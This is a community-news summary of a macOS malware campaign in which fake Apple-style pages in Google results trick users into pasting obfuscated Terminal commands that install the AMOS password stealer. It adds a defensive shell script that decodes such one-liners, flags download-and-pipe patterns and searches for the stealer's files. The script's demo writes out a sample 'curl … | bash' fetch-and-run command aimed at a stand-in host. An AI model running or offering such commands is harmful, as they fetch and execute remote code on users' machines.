More Mac malware from Google search

Google results strike again: fake Apple pages, stolen files, and an AI advice brawl

TLDR: Fake Apple-style pages in Google results are tricking Mac users into pasting commands that install a password-stealing tool. Comments split between locking down macOS permissions, blaming ads and search, and trusting AI to check commands—while skeptics note AI was part of the last scam, so caution wins.

Mac users say Google’s shiny sponsored results just led them straight into a malware trap: fake Apple-style pages and Medium posts that told people to copy-paste a mysterious Terminal command. That command pulls down the AMOS “stealer” — a sneaky program that instantly copies your documents, peeks at Notes, and even drops your password into a hidden file. The community gasped, joked, and raged: one commenter dubbed it paste-and-pray security while others cackled at the hacker’s folder name “FileGrabber.” The “chicken herpes” line from the original report? It became a meme within minutes.

The hottest fight: should we trust AI to vet commands? One user swears by asking a chatbot first, but others shot back that last year’s scam used ChatGPT as the lure, so AI as lifeguard might be the same shark in different sunglasses. Practical voices chimed in too: “turn off Full Disk Access for Terminal” drew nods, while “At least macOS has file permissions” felt like cold comfort when ads push poisoned links to the top. Another spicy debate erupted when a commenter said browsers should let web apps open your home folder — cue privacy alarms. And just when folks thought it was only search results, someone dropped a “GitHub too” warning with receipts. The crowd’s verdict: don’t trust promoted links, don’t paste commands you don’t understand, and don’t let panic click your password into a thief’s hands.

Key Points

  • New macOS malware campaign delivers AMOS (aka SOMA) stealers via forged Apple-like pages and poisoned Medium articles.
  • Malicious content is linked from Google properties (docs.google.com, business.google.com) and appears atop sponsored search results.
  • Users are instructed to paste base-64–obfuscated commands into Terminal; scripts use curl to fetch payloads without quarantine attributes.
  • Upon execution, AMOS exfiltrates Documents to a “FileGrabber” directory and creates hidden files (.agent, .mainHelper, .pass), also seeking access to Notes.
  • The article advises critically evaluating search results and sources, expanding shortened links, and never running opaque Terminal commands.
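The last three points describe both what the lure asks the user to paste and what the stealer leaves behind. The following POSIX shell script is an added example, not code from the article or the thread it summarises: it decodes a pasted base64 one-liner without running it, flags the fetch-and-run pattern the article describes, and searches for the artifact names it lists (the sample one-liner, the example.invalid URL, and the search depth and location of the artifacts are constructed assumptions).

```shell
#!/bin/sh
# Added example, not code from the article or the thread it summarises.
# Defender-side checks for the campaign described in the Key Points:
#   decode_b64_cmd - decode a pasted "echo <base64> | base64 -d | bash"
#                    one-liner WITHOUT running it, so it can be read first
#   flag_decoded   - grep the decoded text for the fetch-and-run pattern
#                    the article describes (curl download, pipe into a shell)
#   scan_artifacts - look for the on-disk names the article lists
#                    (FileGrabber dir; hidden .agent, .mainHelper, .pass)
# The sample one-liner, the example.invalid URL and the search depth and
# location of the artifacts are constructed assumptions for this demo.

# Print the decoded payload of a pasted one-liner; never execute it.
decode_b64_cmd() {
    # take the first long base64-looking token on the line
    b64=$(printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/=]{20,}' | head -n 1)
    [ -n "$b64" ] || return 1
    printf '%s' "$b64" | base64 -d 2>/dev/null
}

# True (exit 0) if the decoded text downloads content or pipes into a shell.
flag_decoded() {
    printf '%s\n' "$1" | grep -qE 'curl|wget|\| *(sh|bash|zsh)( |$)'
}

# List paths under $1 (a few levels deep) whose names match the write-up.
scan_artifacts() {
    find "$1" -maxdepth 3 \( -name FileGrabber -o -name .agent \
        -o -name .mainHelper -o -name .pass \) 2>/dev/null
}

# --- demo on constructed input ------------------------------------------
SAMPLE_PLAIN='curl -fsSL https://example.invalid/p | bash'   # constructed
SAMPLE_LINE="echo $(printf '%s' "$SAMPLE_PLAIN" | base64) | base64 -d | bash"

decoded=$(decode_b64_cmd "$SAMPLE_LINE")
printf 'pasted : %s\ndecoded: %s\n' "$SAMPLE_LINE" "$decoded"
if flag_decoded "$decoded"; then
    echo "verdict: fetch-and-run pattern, do not paste this"
else
    echo "verdict: no obvious fetch/pipe pattern (still read it before running)"
fi
# real-world call would be: scan_artifacts "$HOME"; the demo uses a temp dir
tmp=$(mktemp -d); mkdir -p "$tmp/FileGrabber"; touch "$tmp/.pass"
scan_artifacts "$tmp"; rm -rf "$tmp"
```

Run it with `sh script.sh`; to check a one-liner you were told to paste, call `decode_b64_cmd` on it and read the output instead of pasting it into Terminal.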

Hottest takes

"Thanks for reminding me to turn off Full Disk Access for Terminal" — retired
"misguided (in my opinion) way that browsers refuse to open a homedir" — jeffbee
"At the very least, check your commands with an LLM" — baxtr
Made with <3 by @siedrix and @shesho from CDMX. Powered by Forge&Hive.